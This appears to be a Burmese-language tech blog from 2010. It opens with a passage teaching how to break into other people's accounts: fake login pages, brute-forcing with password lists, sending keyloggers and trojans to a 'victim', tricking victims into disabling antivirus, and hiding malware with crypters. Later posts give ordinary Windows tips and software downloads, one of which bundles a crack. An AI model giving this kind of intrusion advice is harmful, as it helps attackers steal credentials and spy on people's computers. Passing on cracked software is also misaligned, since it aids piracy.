လူတော်တော်များများက ဒီနည်းလမ်းကို အသုံးပြုဖို့ကြိုးစားနေဆဲဖြစ်ပါတယ်။ဒါပေမယ့်…ဒီနည်းလမ်းမှာ အား နည်း ချက်တစ်ခုရှိနေပါတယ်။ အဲဒါကတော့ သားကောင်ဟာ Internet နဲ့ပတ်သတ်ပြီး ဗဟုသုတ အနည်း ငယ် ရှိရုံနဲ့ ဒီ Page ဟာ အစစ်မဟုတ်မှန်းသိနိုင်ပါတယ်။ ဘာကြောင့်လဲဆိုတော့ သူက URL ကို ဖတ်ကြည့်မယ် ဒါဆိုရင်မူရင်း website မဟုတ်ဘူးဆိုတာကို နားလည်သွားနိုင်ပါတယ်။

( ခ ) Brute Forcing
Brute Forcer ဆိုတာကတော့ အခြေခံအားဖြင့် cracker လို့ခေါ်ဆိုနိုင်တဲ့ program တစ်ခုဖြစ်ပါတယ်။ အဲဒီ Brute Forcer ထဲမှာသင်က သင် hack ချင်တဲ့ username ကို ထည့်သွင်းရပါမယ်။ ပြီးတော့ notepad file တစ်ခုကိုလည်း password တစ်ခုကဲ့သို့ထည့်သွင်းရမှာဖြစ်ပြီး အဲဒီ notepad ထဲမှာ ရှိသမျှ အားလုံးနီးပါး အင်္ဂ လိပ် ဘာသာစာလုံးတွေ ပါရှိရမှာဖြစ်ပါတယ်။ ၄င်းကဘယ်လိုအလုပ်လုပ်သလဲဆိုတော့ password မှာပါတဲ့ စာလုံးတစ်လုံးစီတိုင်းအတွက် notepad file ထဲမှာ ရှိသမျှ စာလုံးတိုင်းနဲ့ တိုက်ကြည့်ပါတယ်။ အားလုံးတူ ညီ သွားပြီ ဆိုရင်တော့ ပွဲသိမ်းပဲပေါ့။ တစ်ခြား Forum တွေမှာ " huge pass list" ဆိုတဲ့ ခေါင်းစဉ်ကို သတိပြုမိချင် ပြုမိပါလိမ့်မယ်။ ၄င်းတို့က ဘာမှတော့မဟုတ်ပါဘူး။ ဒါပေမယ့် သင့်ရဲ့ bruteforcer ထဲကို ထည့်သွင်းဖို့ password list ဖြစ်ပါတယ်။

အားနည်းချက်
၁။ တစ်ခါတစ်ရံမှာ brute forcing ဟာ အချိန်အလွန်ကြာမြင့်တတ်ပါတယ်။
၂။ ၄င်းဟာ အာမခံချက် မရှိပါဘူး
၃။ ယနေ့အချိန်ကာလမှာဆိုရင် လူတော်တော်များများဟာ alpha-numeric-symbol password တွေရှိနေကြ ပါပြီ။ brute forcer အတွက် detect လုပ်ဖို့ အလွန်ခက်ခဲပါတယ်။
၎။ ကျော်ကြားတဲ့ gmail ကဲ့သို့သော site တွေမှာ ပြုလုပ်ထားတဲ့ ဒီဇိုင်းတစ်ခုကတော့ login လုပ်တဲ့အခါ (၃) ခါထက်ကျော်ပြီး မှားယွင်းနေပြီးဆိုရင် ၄င်းတို့က "image captcha" ကိုထည့်လိုက်တဲ့အတွက် bruteforcer ကိုရပ်သွားစေပါတယ်။

( ဂ ) Keylogging
Keylogger ကတော့ "server" လို့ ခေါ်ဆိုနိုင်တဲ့ File သေးသေးလေးတွေကို ဖန်တီးဖို့အတွက် သင့်ကို ကူညီ ပေးပါလိမ့်မယ်။ သင်က သင့်ရဲ့ server ကို သားကောင် ဆီသို့ ပေးပို့ရမှာဖြစ်ပါတယ်။ သင့်ရဲ့ သားကောင်က အဲဒီအပေါ်မှာ Click လိုက်ရင်တော့ ကိစ္စပြီးပါပြီ။ ဒီနည်းလမ်းဟာ တစ်စုံတစ်ယောက်ကို hack ဖို့အတွက် အ ကောင်းဆုံးနည်းလမ်းတစ်ခု ဖြစ်နိုင်ပါတယ်။ Keylogger ဆိုတာကတော့ သင့်သားကောင်ရဲ့ computer ထဲမှာ သူဟာသူ install လုပ်နိုင်တဲ့ program တစ်ခုဖြစ်ပြီး၊ သင့်သားကောင်က သူ့ရဲ့ keyboard ပေါ်မှာ ရိုက်လိုက် သမျှ keystroke တိုင်းကို မှတ်တမ်းတင်ထားပါတယ်။ ပြီးရင် ၄င်းက မှတ်တမ်းတင်လို့ ရသမျှတွေကို Hacker ဆီသို့ပေးပို့ပါတယ်။ keystroke ( ဆိုလိုတာက FTP, Email , Messengers ) ကို လက်ခံရရှိဖို့ အများကြီးလမ်း ရှိပါတယ်။ ဒီနည်းလမ်း ဟာ သင့်ရဲ့သားကောင်ကို လှည့်စားပြီး သူတို့ရဲ့ Information တွေကို ရယူဖို့အတွက် အကောင်းဆုံးနည်းလမ်း တစ်ခုဖြစ်ပါတယ်။

အားနည်းချက်
၁။ သင့်ရဲ့ သားကောင်က Keylogger ကိုလက်ခံရရှိတဲ့ အခါ သူတို့ရဲ့ antivirus တွေက keylogger ကို အလို အလျှောက် delete လုပ်လိုက်ခြင်းဖြစ်ပါတယ်။ဒါကြောင့် သင်အနေနဲ့ တစ်စုံတစ်ရာ လှည့်ဖြားခြင်း အားဖြင့် antivirus ကို disable လုပ်ဖို့ စည်းရုံးသိမ်းသွင်းရမှာ ဖြစ်ပါတယ်။
၂။ တခါတရံမှာ Keylog တွေကို ပေးပို့နေတဲ့အချိန်မှာ Firewall က Block လုပ်လိုက်ခြင်းများပဲ ဖြစ်ပါတယ်။

အကြံပြုချက် - "crypters" လို့ခေါ်တဲ့ program တွေကို အသုံးပြုဖို့ပါပဲ။ ၄င်းက သင့်ရဲ့ server တွေကို ရှာဖွေမ တွေ့အောင် ပြုလုပ်နိုင်စေဖို့ ကူညီပေးပါလိမ့်မယ်။ ဒါဆိုရင် သင့်သားကောင် ရဲ့ anti-virus တွေက ၄င်းတို့ကို detect မလုပ်နိုင်တော့ပါဘူး။

(ဃ) Trojans
Trojan တွေကတော့ Keylogger တွေရဲ့ ဖခင်နဲ့တူပါတယ်။Trojan တွေက အပေါ်မှာ ဖော်ပြခဲ့တဲ့ Keylogger တွေအတိုင်းပဲ သင့်ဆီကို Keylog တွေပေးပို့ပါတယ်။ ဒါ့အပြင် ၄င်းတို့က သင့်သားကောင်းရဲ့ computer ကို သင် ထိန်းချုပ်မှုရစေပါတယ်။ သင့်သားကောင်ရဲ့ computer မှာ သင့်စိတ်ကြိုက် File တွေကို Edit / Delete/ Upload/ Download လုပ်နိုင်ပါတယ်။ Trojan တွေမှာ Keyboard ကို ကောင်းကောင်း အလုပ်မလုပ်အောင် (Keyboard မှာ ကိုယ်နှိပ်လိုက်တဲ့ စာလုံးကတစ်ခု၊ ပေါ်နေတာကတစ်ခု ပေါ်ချင်တဲ့ စာလုံးလျှောက်ပေါ် နေတာ၊ တခါတလေ Keys တွေကို ရိုက်လို့ရတဲ့ အခါ ရတယ်၊ မရတဲ့အခါလည်းမရဘူး၊ အဲလိုမျိုးတွေပေါ့ )။CD ROM တွေ Eject လုပ်တဲ့ အခါ ထွက်မလာတာ၊ CD ပြန်ထည့်ပေးဖို့အတွက် တောင်းဆိုတာ စသဖြင့် အခြား အခြား သော Feature တွေလည်း ပါဝင်ပါသေးတယ်။

အားနည်းချက်
Keylogger တွေနဲ့ အတူတူပါပဲ။

အကြံပြုချက် - Keylogger မှာ အကြုံပြုခဲ့သလိုပါပဲ crypter တွေသုံးပါ။

Tuesday, September 7, 2010

Windows ကို Update ပိတ်ထားချင်ရင်...။

windows 7 off update

windows7 အတွက် အောက်ပါအတိုင်း လိုက်လုပ်ပါ။
၁။ Control Panel ဝင်လိုက်ပါ။
၂။ ညာဘက်က အပေါ်မှာ Category မှာ ကလစ်ပြီး Large icons ကို ကလစ်လိုက်ပါ။
၃။ အောက်ဆုံးမှာကြည့်လိုက်ပါ Windows Update ဆိုတာကို ကလစ်လိုက်ပါ။
၎။ ဘယ်ဘက်မှာပြန်ကြည့်ပါ Change settings ကိုကလစ်လိုက်ပါ။ Important updates ရဲ့အောက်နားက ဘားလေးကို Never check for updates (not recommended) ကို ရွေးပေးလိုက်ပါ ပြီးရင် OK ပေးလိုက်ပါ။


windows vistar off update

windows vistar အတွက် အောက်ပါအတိုင်း လုပ်လိုက်ပါ။
၁။ အရင်ဆုံး Control Panal ဝင်လိုက်ပါ။
၂။ ဘယ်ဘက် အပေါ်မှာ Control Panal Home ကိုကလစ်လိုက်ပါ။
၃။ Security မှာ အောက်က Check for updates ကို ကလစ်လိုက်ပါ ပြီးရင် ဘယ်ဘက်မှာ Change settings ကိုကလစ်လိုက်ပါ။
၅။ Never check for updates (not recommended) ကို ကလစ်လိုက်ပါ။
ပြီးရင် OK ကိုနိပ်လိုက်ပါ။



windows xp off update

windows xp အတွက် အောက်ပါအတိုင်း လိုက်လုပ်ပါ။
၁။ အရင်ဆုံး Control Panel ကိုဝင်လိုက်ပါ။
၂။ Control Panel ထည်းမှာ Security Center ကိုရှာပြီး ကလစ် နှိပ်ပါ။
၃။ ပေါ်လာမယ့် ဝင်းဒိုးမှာ အောက်မှာဆုံးမှာကြည့်လိုက်ပါ Automatic Updates ဆိုတာကို ကလစ်လိုက်ပါ။
၎။ နောက်ထပ်ဝင်ဒိုးမှာ Turn off Automatic Updates ကိုကလစ်နှိပ်ပြီး OK ပေးလိုက်ရင်ရပါပြီး။

Windows တက်မလာဘဲ NTLDR Missing ပြနေရင်....။

NTLDR က Windows စတက်ချိန်မှာခေါ်သုံးတဲ့ကောင်ပါ။
Windows တက်ဖို့ အတွက် သူမပါလို့ မရပါဘူး။
Virus ကြောင့် ပဲ ဖြစ်ဖြစ် Windows error ကြောင့်ပဲဖြစ်ဖြစ် NTLDR ပျောက်နေရင်တော့ ...
အလွယ်ဆုံးနည်းလမ်းပြောပြလိုက်ပါမယ်။ စက်ရဲ့ CD / DVD ROM ထဲမှာ Windowsinstallation အခွေထည့်ထားပါ။
Boot ကိုROM နဲ့တက်ပါ။ Windows Installation လမ်းစဉ်အတိုင်းပဲရွေး ပေး ရမဲ့နေရာရောက်ရင်တော့ Repir(R) ကိုနှိပ်ပြီးရွေးလိုက်ပါ။
နောက်ပြီးတော့ Repir command ထဲရောက်တော့မှ...
Windows ခွေထဲက NTLDR ကို copy ကူးပြီး စက်ထဲက Windows အောက်က system32 ထဲကိုထည့်ပေးပါ။
ပြီးရင် reset ပြန်ချလိုက်ပါ Boot ကို normal အတိုင်း Windows နဲ့တက်ကြည့်ပါ။
Windows ပြန်တက်လာပါလိမ့်မယ်။

Windows logon , logoff sound တွေကိုပြောင်းချင်ရင်...။

Control panel ထဲက Sound မှာ Sounds tab ကိုဝင်ပြီးတော့ ...
Program event ဆိုတဲ့စာအောက် Box ထဲမှာ Windows logon ကိုရှာပါ၊
ပြီးရင် Select ပေးထားပြီးတော့ Browse ကနေကိုထည့်ချင်တဲ့သီချင်းသံကို Edit လုပ်ပြီးထည့်ထားလို့ရပါတယ်။
ဒီလိုပဲ Exit windows မှာလဲ ကြိုက်တဲ့သီချင်းကြိုက်တဲ့အသံကို ရွေးပေးထားလို့ရပါတယ်။

မှတ်ချက်။ ။ ပုံလေးတွေနဲ့  ပြုလုပ်ပုံအဆင့်ဆင့်ကို ဖေါ်ပြပေးချင်ပါတယ်။ ဒါပေမယ့် ပုံတွေကို Upload လုပ်ရတာအဆင်မပြေလို့ ပါ။

Monday, September 6, 2010

3_in_1_booster (16.25 MB) <<< Download Hear

3_in_1_booster လေးက...
booster,speedup PC နဲ့ spyeraser ဆိုပြီး ၃မျိုးကို
တခုထဲကနေလုပ်ပေးနိုင်ပါတယ်။ သူ့ကိုသုံးကြည့်ပါ ကိုယ့်စက် ဘယ်လောက်လေးနေလဲ ဘယ်လို
errorတွေဖြစ်နေလဲဆိုတာကို တွေ့ရမှာပါ..။
booster လေးကို စစ်ပေးပါ။... ပြီးရင် Repair လုပ်ပေးပါ။
speedup လုပ်ပေးတာပါ...။

ဒီကောင်လေးနဲ့တော့ တပတ် တခါလောက်တော့ အနဲဆုံးစစ်ပေးသင့်ပါတယ်။
စစချင်းတော့ ကိုယ့်စက်ပေါ်မူတည်ပြီး Low,Medium,High ဆိုပြီး ပြပေးမှာပါ။
တခါထဲစစ်ပြီးယုံနဲ့ High မဖြစ်ရင်..။ နောက်စစ်ပေးတာများမှ High ဖြစ်လာပါလေ့မယ်။သုံးချင်တယ်ဆိုရင်တော့ ဒေါင်းယူလိုက်ပေါ့။

Computer သုံးရတာ အရမ်းလေးနေတယ်ဆိုတဲ့ သူများ 3_in_1_booster လေးနဲ့  Rum ကြည့်လိုက်ပါ။

အဆင်ပြေသွားမှာပါ။

“ Desktop ပေါ်မှာ...နှင်းကျမယ် ” <<< Download Now

“ Desktop ပေါ်မှာ...နှင်းကျမယ် ”
ကွန်ပျူတာမှာနှင်းတွေကျ ချင်တယ်ဆိုရင်တော့...
Addach File ကိုဒေါင်းလိုက်ပြီး ကိုယ့်ကွန်ပျူတာမှာ Run ထားလိုက်ရင်...
ကွန်ပျူတာထဲမှာ နှင်းတွေကျနေသလို ဖြစ်သွားပါလိမ့်မယ်။
လက်တွေ့လုပ်ကြည့်လိုက်ပါ။

Sunday, September 5, 2010

Windows(Operating System) ကပါတဲ့ CD–Burn တဲ့နည်းလေးပါ…။

Windows (OS) မှာ Default ပါလာတဲ့ Feature လေးတစ်ခုပါ။ လူတော်တော်များများ သိထားတာကတော့ CD-Burn တော့ မယ်ဆိုရင် Nero Software (Burning Software) တို့ ဘာတို့  ရှိမှ Burn လိုရတယ်ထင်နေ ကြတယ်။ တစ်ကယ်မှာတော့…. Microsoft ကသူ့ ရဲ့ Windows (Operating System) မှာ User တွေ အသုံးပြု့လို့  အဆင်ပြေအောင် Functions တွေ တော် တော်များများထည့်ပေးထားပါတယ်။ အရေကြီး CD-Burn ရတော့ မယ် ဆိုရင် စက်ထဲမှာ Nero မှမရှိရင် အဆင်မပြေတော့ ဘူး ဖြစ်နေတဲ့ သူများအတွက်ပေါ့…။ Windows ထဲမှာပဲ CD-Burn လို့ ရတာကို သိထားရင်… အရေးကြုံလာတော့ အဆင်ပြေ တာ ပေါ့။
1) မိမိရဲ့ Computer မှာ CD-ROM (CD Drive) တပ်ဆင်ထားရပါမယ်။
2) CD-Burn ချင်တဲ့ Data ရှိရပါမယ်။
3) မိမိရဲ့ Data ပေါ်မှာ Right Click နှိပ်ပြီး Send To ဆိုပြီး CD/DVD ROM ကိုညွှန်းပေးရပါမယ်။
4)အဲ့ဒီလိုညွှန်းပေးလိုက်ရင်… Start Menu Bar ရဲ့ ညာဘက်ထောင့်နားလေးမှာ CD Drive ပုံလေး ပေါ် လာပါလိမ့်မယ်။
5)အဲ့ဒီပေါ်လာတဲ့ CD Drive ပုံလေးကို Double Click နှိပ်ပြီးဖွင့်လိုက်ပါ။( My Computer ထဲကနေ CD Drive ကိုသွားဖွင့်ရင်လဲရပါတယ်။)
6) CD Drive ထဲမှာ မိမိ Burn ချင်တဲ့ Data လေးရောက်နေတာ တွေ့ ရပါလိမ့်မယ်။ CD/DVD Drive ထဲကို CD အလွတ်ထည့်ပေးထားရပါမယ်။ အဲ့ဒီတော့မှ ရောက် နေတဲ့ Data ကို Select မှတ်၊ ပြီးရင် ဘယ်ဘက်မှာရှိတဲ့ Write these folder to CD ဆိုတာကို Click နှိပ်လိုက်ပါ။
7) CD Writing Wizard Box လေးပေါ်လာပါလိမ့်မယ်။ အဲ့ဒီမှာတော့ မိမိ Burn မယ့် CD ကို ကြိုက်နှစ် သက်ရာ နာမည်ပေးလို့ ရပါတယ်။
8) CD Name ပေးပြီးပြီ ဆိုရင် Next ကို Click နှိပ်ပြီးဆက်သွားပါ။ အဲ့ဒါဆိုရင်တော့ မိမိတို့  Data ကို CD ထဲသို့  Burn နေပါလိမ့်မယ်။ အားလုံးပြီးသွားပြီဆိုရင် Finish ကိုနှိပ်လိုက်ပေါ့။ အဲ့ဒီအခါမှာတော့ CD/DVD Drive ထဲက CD က Auto ထွက်လာပါလိမ့်မယ်။
အားလုံး အဆင်ပြေပါစေ။
မသိသေးတဲ့သူများအတွက် ရည်ရွယ်ပါတယ်။

Wednesday, September 1, 2010

Slideshow-Diashow XL v10.5.6 <<< Download Now

Picture လေးတွေ slidwshows တွက် application ကောင်းလေတစ်ခု ရှယ်လိုက်တယ်ဗျာ။ လွယ်ကူလျှင်မြန်စွာ အသုံးချလို့ရပါတယ်။ song လေးနဲ့ တွဲဖက်သုံးလို့ရပါတယ် HTML webpages အဖြစ်အသုံးချနိုင်တယ်ဗျာ။ Slideshow for PC, autostarting CD-ROM, DVD, VCD, SVCD စတာတွေ အသုံးချလို့ရပါတယ်။ ထူးခြားတဲ့ New Features လေးတွေကတော့ Mobile Phones; iphone; ipod စတာတွေမှာလဲ အဆင်ပြေပြေ အသုံးပြုနိုင်တယ်။ အခွေနဲ့တိုက်ရိုက် burn ယူနိုင်သလို Pc အတွက်လည်း save လုပ်ပေးနိုင်ပါတယ်။
Version 10.5.6 ဖြစ်ပါတယ်။
File size ကတော့ 17.5 MB ဖြစ်ပါတယ်။
Download ဖိုင်ထဲမှာ Crack ဖိုင်လေးပါ ထည့်ပေးထားပါတယ်။


သုံးစွဲသူတိုင်းအဆင်ပြေပါစေ..........။

Music Status in Gtalk ( Using Winamp ) <<< Download Now

Winamp ကို အသုံးပြုပြီး Show Current Music Track လုပ်တာကို ဖော်ပြပေးသွားပါမယ်။ Winamp Player ကိုတော့ ဒေါင်းလုတ်အရင်လုပ်ရပါမယ်။ ပြီးရင် နှစ်သက်ရာ သီချင်းကို Winamp Player နဲ့ ဖွင့်ပြီး Gtalk မှာ Show Current Music Track ကို ပေးလိုက်ရင် ရပါပြီ။

အကယ်၍များ Show Current Music Track က အလုပ်မလုပ်ခဲ့ဘူးဆိုရင် ---
• Go to the root directory of Winamp which is usually in C:Program FilesWinamp
• Select Tools->Folder Options->View (Tab) and uncheck the hide extensions for known file types and click Ok.
• Now create an empty file (Right click the mouse -> New -> Text document), so the default file would be like “New Text Document.txt”.
• Rename the above file to “winamp.m3u” and save.
• Close Winamp and Google Talk. Now open again and Your Show Current music track status should work.
Vista & Win 7 သမားများ အပေါ်နည်းအတိုင်းလုပ်လို့ မှ မရဘူးဆိုရင်တော့ Gtalk ကို Uninstall ပြန်လုပ်ပြီး Run as administrator နဲ့ ပြန်ပြီး Install လိုက်ပါ။ အဆင်ပြေသွားပါလိမ့်မယ်။


Ref : http://www.sankaranand.com

Advanced Office Password Recovery <<< Download Now

Advanced Office Password Recovery (2.77mb)

Office File တော်တော်များများ password recover လုပ်လို့ရပါတယ်။
အဆင်ပြေမယ်လို့ တင်ပါတယ်။
လိုအပ်ခဲ့မယ်ဆိုရင်တော့ ဒေါင်းယူလိုက်ပါ အဆင်ပြေပါစေ။

Myanmar character picker

မြန်မာစာ ဖောင့်ကို keyboard ကနေမရိုက်တတ်သူတွေအတွက်....


အဆင်ပြေပါစေ...။